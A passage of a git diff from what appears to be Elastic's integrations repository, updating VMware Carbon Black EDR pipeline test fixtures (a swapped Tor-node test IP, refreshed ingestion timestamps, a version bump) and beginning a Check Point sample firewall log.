+{"process_id":"00000001-0000-afbc-01cf-b31b9e83777f","segment_id":1,"docs":{"modload_count":0,"host_type":"workstation","netconn_count":"1","os_type":"windows","unique_id":"00000001-0000-afbc-01cf-b31b9e83777f-00000001","username":"win8-test\\admin","last_update":"2014-08-08T15:15:47.544Z","parent_md5":"332feab1435662fc6c672e25beb37be3","path":"c:\\users\\admin\\desktop\\putty.exe","filemod_count":0,"regmod_count":6,"process_name":"putty.exe","cmdline":"\"c:\\users\\admin\\desktop\\putty.exe\" ","parent_unique_id":"00000001-0000-09e4-01cf-a5dee70168f2-00000001","childproc_count":0,"process_pid":"44988","start":"2014-08-08T15:15:42.193Z","process_md5":"a3ccfd0aa0b17fd23aa9fd0d84b86c05","parent_name":"explorer.exe","parent_pid":"2532","group":"Default Group"},"report_id":"TOR-Node-81.2.69.144","ioc_type":"ipv4","ioc_value":"81.2.69.144","ioc_attr":{"port":"22","protocol":"TCP","direction":"Outbound"},"hostname":"WIN8-TEST","sensor_id":1,"cb_version":"4.2.1.140808.1059","server_name":"localhost","feed_id":14,"feed_name":"tor","event_timestamp":1407362099.567} {"md5":"C3489639EC8E181044F6C6BFD3D01AC9","docs":[{"file_version":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","product_name":"Microsoft Windows Operating System","is_executable_image":"true","digsig_result":"Signed","observed_filename":["c:\\windows\\system32\\sndvol.exe","C:\\Windows\\system32\\sndvol.exe"],"os_type":"Windows","orig_mod_len":"273920","company_name":"Microsoft Corporation","server_added_timestamp":"Aug 9, 2014 5:27:56 PM","internal_name":"Volume Control Applet","copied_mod_len":"0","product_version":"6.1.7601.17514","digsig_sign_time":"2010-11-21T00:37:00.000Z","alliance_score_srstrust":"-100","digsig_result_code":"0","file_desc":"Volume Mixer","endpoint":"WIN8-TEST|1","legal_copyright":"Microsoft Corporation. All rights reserved.","original_filename":"SndVol.exe","is_64bit":"true","md5":"C3489639EC8E181044F6C6BFD3D01AC9","digsig_publisher":"Microsoft Corporation","group":"Default Group"}],"report_id":"c3489639ec8e181044f6c6bfd3d01ac9","ioc_type":"md5","ioc_value":"c3489639ec8e181044f6c6bfd3d01ac9","ioc_attr":{},"hostname":"WIN8-TEST","sensor_id":1,"cb_version":"4.2.1.140811.1054","server_name":"localhost","feed_id":2,"feed_name":"srstrust","event_timestamp":1407621575.945} {"process_id":"00000001-0000-1098-01cf-cc5fea563f8f","sensor_id":1,"segment_id":1,"docs":[{"username":"WIN7X64-BUILDER\\User","process_md5":"f2c7bb8acc97f92e987a2d4087d021b1","modload_count":20,"parent_unique_id":"00000001-0000-0a84-01cf-c240c9d1f378-00000001","process_name":"notepad.exe","cmdline":"\"c:\\windows\\system32\\notepad.exe\" ","os_type":"windows","path":"c:\\windows\\system32\\notepad.exe","last_update":"2014-09-09T18:57:34.267Z","parent_pid":2692,"crossproc_count":0,"parent_name":"explorer.exe","parent_md5":"000000000000000000000000000000","group":"Default Group","netconn_count":0,"hostname":"WIN7X64-BUILDER","host_type":"workstation","filemod_count":0,"start":"2014-09-09T18:57:34.251Z","unique_id":"00000001-0000-1098-01cf-cc5fea563f8f-00000001","regmod_count":0,"childproc_count":0,"process_pid":4248}],"hostname":"DXM021-VM1","event_timestamp":1410289221.38,"feed_name":"dxmtest2","feed_id":12,"ioc_value":"cb.urlver=1&cb.q.process_name=notepad.exe&sort=start%20desc&rows=10&start=0","ioc_type":"query","ioc_attrs":{"highlights":["PREPREPREnotepad.exePOSTPOSTPOST","c:\\windows\\system32\\PREPREPREnotepad.exePOSTPOSTPOST"]},"report_id":"notepad_proc"} {"sensor_id":1,"docs":[{"host_count":1,"digsig_result":"Unsigned","observed_filename":["c:\\program files (x86)\\programmer's notepad\\pn.exe"],"product_version":"2.3.4.0-charles","signed":"Unsigned","is_executable_image":false,"orig_mod_len":3092992,"is_64bit":false,"group":["Default Group"],"file_version":"2.3.4.0","company_name":"Simon Steele (Echo Software)","internal_name":"PNWTL","product_name":"Programmer's Notepad","digsig_result_code":"2148204800","timestamp":"2014-09-09T21:00:29.875Z","copied_mod_len":3092992,"server_added_timestamp":"2014-09-09T21:00:29.875Z","md5":"EFA7ECAF4468E0106E8B1041C5CE450E","endpoint":["WIN7X64-BUILDER|1"],"legal_copyright":"Copyright © 2002-2010 Simon Steele (Echo Software)","original_filename":"pn.exe","os_type":"Windows","file_desc":"Programmer's Notepad 2","last_seen":"2014-09-09T21:00:29.875Z"}],"hostname":"DXM021-VM1","event_timestamp":1410296635.26,"feed_name":"dxmtest2","feed_id":12,"ioc_value":"cb.urlver=1&cb.q.process_name=notepad.exe&sort=start%20desc&rows=10&start=0","ioc_type":"query","md5":"EFA7ECAF4468E0106E8B1041C5CE450E","report_id":"Newly Loaded Modules"} diff --git a/packages/carbonblack_edr/changelog.yml b/packages/carbonblack_edr/changelog.yml index 68a20ac43db..3503668c17d 100644 --- a/packages/carbonblack_edr/changelog.yml +++ b/packages/carbonblack_edr/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.3.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.3.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json index 27615ab2c83..50537bb54c7 100644 --- a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json +++ b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json @@ -376,9 +376,9 @@ "sensor_id": 1, "cb_version": "4.2.1.140808.1059", "server_name": "localhost.localdomain", - "report_id": "TOR-Node-38.229.70.52", + "report_id": "TOR-Node-81.2.69.144", "ioc_type": "ipv4", - "ioc_value": "38.229.70.52", + "ioc_value": "81.2.69.144", "feed_name": "tor", "event_timestamp": 1407362000 }, @@ -628,7 +628,7 @@ "group": "Default Group", "unique_id": "00000001-0000-afbc-01cf-b31b9e83777f-00000001" }, - "report_id": "TOR-Node-38.229.70.52", + "report_id": "TOR-Node-81.2.69.144", "sensor_id": 1, "segment_id": 1, "ioc_attr": { @@ -636,7 +636,7 @@ "port": "22", "protocol": "TCP" }, - "ioc_value": "38.229.70.52", + "ioc_value": "81.2.69.144", "hostname": "WIN8-TEST", "server_name": "localhost" } diff --git a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json index 6e342ce6339..9466d8b1c80 100644 --- a/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json +++ b/packages/carbonblack_edr/data_stream/log/_dev/test/pipeline/test-events.json-expected.json @@ -25,7 +25,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797126500Z", + "ingested": "2021-12-09T13:31:11.837643800Z", "category": [ "file" ], @@ -64,7 +64,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797143800Z", + "ingested": "2021-12-09T13:31:11.837650800Z", "category": [ "file" ], @@ -101,7 +101,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797153600Z", + "ingested": "2021-12-09T13:31:11.837656700Z", "category": [ "file" ], @@ -140,7 +140,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797162100Z", + "ingested": "2021-12-09T13:31:11.837663300Z", "category": [ "file" ], @@ -179,7 +179,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797170300Z", + "ingested": "2021-12-09T13:31:11.837667900Z", "category": [ "file" ], @@ -216,7 +216,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797178700Z", + "ingested": "2021-12-09T13:31:11.837671800Z", "category": [ "file" ], @@ -255,7 +255,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797187Z", + "ingested": "2021-12-09T13:31:11.837676800Z", "category": [ "file" ], @@ -294,7 +294,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797195400Z", + "ingested": "2021-12-09T13:31:11.837682200Z", "category": [ "file" ], @@ -333,7 +333,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797203600Z", + "ingested": "2021-12-09T13:31:11.837687900Z", "category": [ "file" ], @@ -420,7 +420,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797211700Z", + "ingested": "2021-12-09T13:31:11.837694200Z", "kind": "event" } }, @@ -448,7 +448,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797219900Z", + "ingested": "2021-12-09T13:31:11.837700600Z", "category": [ "file" ], @@ -491,7 +491,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797228400Z", + "ingested": "2021-12-09T13:31:11.837707200Z", "category": [ "file" ], @@ -585,7 +585,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797236700Z", + "ingested": "2021-12-09T13:31:11.837713500Z", "kind": "event" } }, @@ -613,7 +613,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797247900Z", + "ingested": "2021-12-09T13:31:11.837719700Z", "category": [ "file" ], @@ -657,7 +657,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797256700Z", + "ingested": "2021-12-09T13:31:11.837725900Z", "kind": "event" }, "tags": [ @@ -690,7 +690,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797265Z", + "ingested": "2021-12-09T13:31:11.837732100Z", "category": [ "file" ], @@ -717,7 +717,7 @@ "sensor_id": 1, "process_id": "00000001-0000-afbc-01cf-b31b9e83777f", "ioc_attr": {}, - "report_id": "TOR-Node-38.229.70.52", + "report_id": "TOR-Node-81.2.69.144", "event_timestamp": 1.407362E9, "feed_id": 14, "feed_name": "tor" @@ -732,14 +732,14 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797273700Z", + "ingested": "2021-12-09T13:31:11.837738500Z", "kind": "event" }, "threatintel": { "indicator": { "type": "ipv4-addr", "port": 22, - "ip": "38.229.70.52" + "ip": "81.2.69.144" } }, "tags": [ @@ -775,7 +775,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797282Z", + "ingested": "2021-12-09T13:31:11.837744600Z", "category": [ "file" ], @@ -819,7 +819,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797290300Z", + "ingested": "2021-12-09T13:31:11.837750800Z", "kind": "event" }, "tags": [ @@ -852,7 +852,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797298500Z", + "ingested": "2021-12-09T13:31:11.837757Z", "category": [ "file" ], @@ -902,7 +902,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797306700Z", + "ingested": "2021-12-09T13:31:11.837763200Z", "category": [ "network" ], @@ -945,7 +945,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797314700Z", + "ingested": "2021-12-09T13:31:11.837771300Z", "kind": "event" }, "threatintel": { @@ -986,7 +986,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797323200Z", + "ingested": "2021-12-09T13:31:11.837777800Z", "category": [ "file" ], @@ -1030,7 +1030,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797331600Z", + "ingested": "2021-12-09T13:31:11.837784300Z", "kind": "event" }, "tags": [ @@ -1063,7 +1063,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797339900Z", + "ingested": "2021-12-09T13:31:11.837790600Z", "category": [ "file" ], @@ -1114,7 +1114,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797348100Z", + "ingested": "2021-12-09T13:31:11.837796800Z", "category": [ "network" ], @@ -1154,7 +1154,7 @@ "sensor_id": 1, "process_id": "00000001-0000-afbc-01cf-b31b9e83777f", "ioc_attr": {}, - "report_id": "TOR-Node-38.229.70.52", + "report_id": "TOR-Node-81.2.69.144", "doc": { "netconn_count": "1", "childproc_count": 0, @@ -1177,7 +1177,7 @@ "indicator": { "type": "ipv4-addr", "port": 22, - "ip": "38.229.70.52" + "ip": "81.2.69.144" } }, "tags": [ @@ -1213,7 +1213,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797356100Z", + "ingested": "2021-12-09T13:31:11.837803Z", "kind": "event" } }, @@ -1251,7 +1251,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797364400Z", + "ingested": "2021-12-09T13:31:11.837809200Z", "category": [ "registry" ], @@ -1289,7 +1289,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797372500Z", + "ingested": "2021-12-09T13:31:11.837815400Z", "category": [ "file" ], @@ -1333,7 +1333,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797381Z", + "ingested": "2021-12-09T13:31:11.837821600Z", "kind": "event" }, "tags": [ @@ -1368,7 +1368,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797389100Z", + "ingested": "2021-12-09T13:31:11.837827900Z", "category": [ "file" ], @@ -1419,7 +1419,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797397400Z", + "ingested": "2021-12-09T13:31:11.837834100Z", "category": [ "network" ], @@ -1524,7 +1524,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797405400Z", + "ingested": "2021-12-09T13:31:11.837840400Z", "kind": "event" } }, @@ -1562,7 +1562,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797413800Z", + "ingested": "2021-12-09T13:31:11.837846800Z", "category": [ "registry" ], @@ -1600,7 +1600,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797422200Z", + "ingested": "2021-12-09T13:31:11.837853100Z", "category": [ "file" ], @@ -1637,7 +1637,7 @@ }, "event": { "action": "ingress.event.tamper", - "ingested": "2021-08-17T19:44:42.797466500Z", + "ingested": "2021-12-09T13:31:11.837859400Z", "category": [ "process", "driver" @@ -1682,7 +1682,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797475300Z", + "ingested": "2021-12-09T13:31:11.837865700Z", "kind": "event" }, "tags": [ @@ -1717,7 +1717,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797483500Z", + "ingested": "2021-12-09T13:31:11.837871900Z", "category": [ "file" ], @@ -1770,7 +1770,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797491900Z", + "ingested": "2021-12-09T13:31:11.837878700Z", "category": [ "network" ], @@ -1861,7 +1861,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797500200Z", + "ingested": "2021-12-09T13:31:11.837885Z", "kind": "event" }, "tags": [ @@ -1903,7 +1903,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797508600Z", + "ingested": "2021-12-09T13:31:11.837891200Z", "category": [ "registry" ], @@ -1941,7 +1941,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797516800Z", + "ingested": "2021-12-09T13:31:11.837897300Z", "category": [ "file" ], @@ -1978,7 +1978,7 @@ }, "event": { "action": "ingress.event.tamper", - "ingested": "2021-08-17T19:44:42.797528500Z", + "ingested": "2021-12-09T13:31:11.837903400Z", "category": [ "process", "driver" @@ -2023,7 +2023,7 @@ }, "event": { "action": "binaryinfo.host.observed", - "ingested": "2021-08-17T19:44:42.797537Z", + "ingested": "2021-12-09T13:31:11.837909700Z", "category": [ "host" ], @@ -2067,7 +2067,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797545400Z", + "ingested": "2021-12-09T13:31:11.837915900Z", "kind": "event" }, "tags": [ @@ -2102,7 +2102,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797553700Z", + "ingested": "2021-12-09T13:31:11.837922100Z", "category": [ "file" ], @@ -2153,7 +2153,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797562100Z", + "ingested": "2021-12-09T13:31:11.837928100Z", "category": [ "network" ], @@ -2242,7 +2242,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797572700Z", + "ingested": "2021-12-09T13:31:11.837934200Z", "kind": "event" }, "tags": [ @@ -2284,7 +2284,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797581100Z", + "ingested": "2021-12-09T13:31:11.837940400Z", "category": [ "registry" ], @@ -2322,7 +2322,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797589300Z", + "ingested": "2021-12-09T13:31:11.837946500Z", "category": [ "file" ], @@ -2359,7 +2359,7 @@ }, "event": { "action": "ingress.event.tamper", - "ingested": "2021-08-17T19:44:42.797597700Z", + "ingested": "2021-12-09T13:31:11.837952800Z", "category": [ "process", "driver" @@ -2404,7 +2404,7 @@ }, "event": { "action": "binaryinfo.host.observed", - "ingested": "2021-08-17T19:44:42.797606100Z", + "ingested": "2021-12-09T13:31:11.837959100Z", "category": [ "host" ], @@ -2448,7 +2448,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797614300Z", + "ingested": "2021-12-09T13:31:11.837965300Z", "kind": "event" }, "tags": [ @@ -2494,7 +2494,7 @@ }, "event": { "action": "ingress.event.module", - "ingested": "2021-08-17T19:44:42.797622500Z", + "ingested": "2021-12-09T13:31:11.837971600Z", "category": [ "process" ], @@ -2536,7 +2536,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797630800Z", + "ingested": "2021-12-09T13:31:11.837977800Z", "category": [ "file" ], @@ -2587,7 +2587,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797638900Z", + "ingested": "2021-12-09T13:31:11.837984Z", "category": [ "network" ], @@ -2623,7 +2623,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797647100Z", + "ingested": "2021-12-09T13:31:11.837990200Z", "kind": "event" }, "tags": [ @@ -2665,7 +2665,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797655300Z", + "ingested": "2021-12-09T13:31:11.837996400Z", "category": [ "registry" ], @@ -2703,7 +2703,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797663600Z", + "ingested": "2021-12-09T13:31:11.838002600Z", "category": [ "file" ], @@ -2740,7 +2740,7 @@ }, "event": { "action": "ingress.event.tamper", - "ingested": "2021-08-17T19:44:42.797671900Z", + "ingested": "2021-12-09T13:31:11.838008700Z", "category": [ "process", "driver" @@ -2785,7 +2785,7 @@ }, "event": { "action": "binaryinfo.host.observed", - "ingested": "2021-08-17T19:44:42.797680300Z", + "ingested": "2021-12-09T13:31:11.838014900Z", "category": [ "host" ], @@ -2829,7 +2829,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797688400Z", + "ingested": "2021-12-09T13:31:11.838021200Z", "kind": "event" }, "tags": [ @@ -2875,7 +2875,7 @@ }, "event": { "action": "ingress.event.module", - "ingested": "2021-08-17T19:44:42.797696600Z", + "ingested": "2021-12-09T13:31:11.838027500Z", "category": [ "process" ], @@ -2917,7 +2917,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797704900Z", + "ingested": "2021-12-09T13:31:11.838033800Z", "category": [ "file" ], @@ -2967,7 +2967,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797713100Z", + "ingested": "2021-12-09T13:31:11.838040200Z", "category": [ "network" ], @@ -3011,7 +3011,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797721400Z", + "ingested": "2021-12-09T13:31:11.838046500Z", "kind": "event" }, "tags": [ @@ -3057,7 +3057,7 @@ }, "event": { "action": "ingress.event.remotethread", - "ingested": "2021-08-17T19:44:42.797729800Z", + "ingested": "2021-12-09T13:31:11.838052600Z", "category": [ "process" ], @@ -3105,7 +3105,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797738200Z", + "ingested": "2021-12-09T13:31:11.838058800Z", "category": [ "registry" ], @@ -3143,7 +3143,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797746500Z", + "ingested": "2021-12-09T13:31:11.838064900Z", "category": [ "file" ], @@ -3180,7 +3180,7 @@ }, "event": { "action": "ingress.event.tamper", - "ingested": "2021-08-17T19:44:42.797754600Z", + "ingested": "2021-12-09T13:31:11.838071100Z", "category": [ "process", "driver" @@ -3225,7 +3225,7 @@ }, "event": { "action": "binaryinfo.host.observed", - "ingested": "2021-08-17T19:44:42.797762800Z", + "ingested": "2021-12-09T13:31:11.838077200Z", "category": [ "host" ], @@ -3269,7 +3269,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797771200Z", + "ingested": "2021-12-09T13:31:11.838083700Z", "kind": "event" }, "tags": [ @@ -3315,7 +3315,7 @@ }, "event": { "action": "ingress.event.module", - "ingested": "2021-08-17T19:44:42.797779400Z", + "ingested": "2021-12-09T13:31:11.838089800Z", "category": [ "process" ], @@ -3357,7 +3357,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797787600Z", + "ingested": "2021-12-09T13:31:11.838097900Z", "category": [ "file" ], @@ -3408,7 +3408,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797796Z", + "ingested": "2021-12-09T13:31:11.838104800Z", "category": [ "network" ], @@ -3446,7 +3446,7 @@ }, "event": { "action": "unknown", - "ingested": "2021-08-17T19:44:42.797804100Z", + "ingested": "2021-12-09T13:31:11.838111Z", "kind": "event" }, "tags": [ @@ -3492,7 +3492,7 @@ }, "event": { "action": "ingress.event.remotethread", - "ingested": "2021-08-17T19:44:42.797812300Z", + "ingested": "2021-12-09T13:31:11.838117400Z", "category": [ "process" ], @@ -3540,7 +3540,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797820500Z", + "ingested": "2021-12-09T13:31:11.838123700Z", "category": [ "registry" ], @@ -3592,7 +3592,7 @@ }, "event": { "action": "ingress.event.childproc", - "ingested": "2021-08-17T19:44:42.797828600Z", + "ingested": "2021-12-09T13:31:11.838129900Z", "category": [ "process" ], @@ -3631,7 +3631,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797836900Z", + "ingested": "2021-12-09T13:31:11.838136200Z", "category": [ "file" ], @@ -3668,7 +3668,7 @@ }, "event": { "action": "ingress.event.tamper", - "ingested": "2021-08-17T19:44:42.797845200Z", + "ingested": "2021-12-09T13:31:11.838142400Z", "category": [ "process", "driver" @@ -3717,7 +3717,7 @@ }, "event": { "action": "binaryinfo.host.observed", - "ingested": "2021-08-17T19:44:42.797855Z", + "ingested": "2021-12-09T13:31:11.838148700Z", "category": [ "host" ], @@ -3761,7 +3761,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797863700Z", + "ingested": "2021-12-09T13:31:11.838155Z", "kind": "event" }, "tags": [ @@ -3807,7 +3807,7 @@ }, "event": { "action": "ingress.event.module", - "ingested": "2021-08-17T19:44:42.797871900Z", + "ingested": "2021-12-09T13:31:11.838161200Z", "category": [ "process" ], @@ -3849,7 +3849,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797880300Z", + "ingested": "2021-12-09T13:31:11.838167400Z", "category": [ "file" ], @@ -3899,7 +3899,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797920800Z", + "ingested": "2021-12-09T13:31:11.838173600Z", "category": [ "network" ], @@ -3946,7 +3946,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797929800Z", + "ingested": "2021-12-09T13:31:11.838179800Z", "category": [ "registry" ], @@ -3998,7 +3998,7 @@ }, "event": { "action": "ingress.event.remotethread", - "ingested": "2021-08-17T19:44:42.797936600Z", + "ingested": "2021-12-09T13:31:11.838186Z", "category": [ "process" ], @@ -4046,7 +4046,7 @@ }, "event": { "action": "ingress.event.regmod", - "ingested": "2021-08-17T19:44:42.797940900Z", + "ingested": "2021-12-09T13:31:11.838192300Z", "category": [ "registry" ], @@ -4098,7 +4098,7 @@ }, "event": { "action": "ingress.event.childproc", - "ingested": "2021-08-17T19:44:42.797946700Z", + "ingested": "2021-12-09T13:31:11.838198500Z", "category": [ "process" ], @@ -4137,7 +4137,7 @@ }, "event": { "action": "binaryinfo.observed", - "ingested": "2021-08-17T19:44:42.797955400Z", + "ingested": "2021-12-09T13:31:11.838204800Z", "category": [ "file" ], @@ -4187,7 +4187,7 @@ }, "event": { "action": "ingress.event.filemod", - "ingested": "2021-08-17T19:44:42.797963500Z", + "ingested": "2021-12-09T13:31:11.838211Z", "category": [ "file" ], @@ -4231,7 +4231,7 @@ }, "event": { "action": "binaryinfo.host.observed", - "ingested": "2021-08-17T19:44:42.797971900Z", + "ingested": "2021-12-09T13:31:11.838217300Z", "category": [ "host" ], @@ -4275,7 +4275,7 @@ }, "event": { "action": "ingress.event.moduleload", - "ingested": "2021-08-17T19:44:42.797979300Z", + "ingested": "2021-12-09T13:31:11.838223500Z", "kind": "event" }, "tags": [ @@ -4321,7 +4321,7 @@ }, "event": { "action": "ingress.event.module", - "ingested": "2021-08-17T19:44:42.797985400Z", + "ingested": "2021-12-09T13:31:11.838230300Z", "category": [ "process" ], @@ -4363,7 +4363,7 @@ }, "event": { "action": "binaryinfo.group.observed", - "ingested": "2021-08-17T19:44:42.797994Z", + "ingested": "2021-12-09T13:31:11.838236600Z", "category": [ "file" ], @@ -4413,7 +4413,7 @@ }, "event": { "action": "ingress.event.netconn", - "ingested": "2021-08-17T19:44:42.797998700Z", + "ingested": "2021-12-09T13:31:11.838242800Z", "category": [ "network" ], @@ -4459,7 +4459,7 @@ }, "event": { "action": "ingress.event.filemod", - "ingested": "2021-08-17T19:44:42.798004700Z", + "ingested": "2021-12-09T13:31:11.838249100Z", "category": [ "file" ], @@ -4511,7 +4511,7 @@ }, "event": { "action": "ingress.event.remotethread", - "ingested": "2021-08-17T19:44:42.798013200Z", + "ingested": "2021-12-09T13:31:11.838255300Z", "category": [ "process" ], diff --git a/packages/carbonblack_edr/manifest.yml b/packages/carbonblack_edr/manifest.yml index 7fe83db0f9a..f68689a20b1 100644 --- a/packages/carbonblack_edr/manifest.yml +++ b/packages/carbonblack_edr/manifest.yml @@ -1,6 +1,6 @@ name: carbonblack_edr title: VMware Carbon Black EDR -version: 0.3.0 +version: 0.3.1 release: experimental description: Collect logs from VMware Carbon Black EDR with Elastic Agent. type: integration diff --git a/packages/checkpoint/_dev/deploy/docker/sample_logs/test-checkpoint.log b/packages/checkpoint/_dev/deploy/docker/sample_logs/test-checkpoint.log index 9e86bccac9c..e659322e65b 100644 --- a/packages/checkpoint/_dev/deploy/docker/sample_logs/test-checkpoint.log +++ b/packages/checkpoint/_dev/deploy/docker/sample_logs/test-checkpoint.log @@ -1,20 +1,20 @@ <134>1 2020-03-29T13:19:20Z gw-da58d3 CheckPoint 1930 - [flags:"133440"; ifdir:"inbound"; ifname:"daemon"; loguid:"{0x5e80a059,0x0,0x6401a8c0,0x3c7878a}"; origin:"192.168.1.100"; sequencenum:"1"; version:"5"; product:"System Monitor"; sys_message::"The eth0 interface is not protected by the anti-spoofing feature. Your network may be at risk"] <134>1 2020-03-29T13:19:21Z gw-da58d3 CheckPoint 1930 - [flags:"133440"; ifdir:"inbound"; ifname:"daemon"; loguid:"{0x5e80a059,0x2,0x6401a8c0,0x3c7878a}"; origin:"192.168.1.100"; sequencenum:"2"; version:"5"; product:"System Monitor"; sys_message::"installed Standard"] <134>1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46915"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] -<134>1 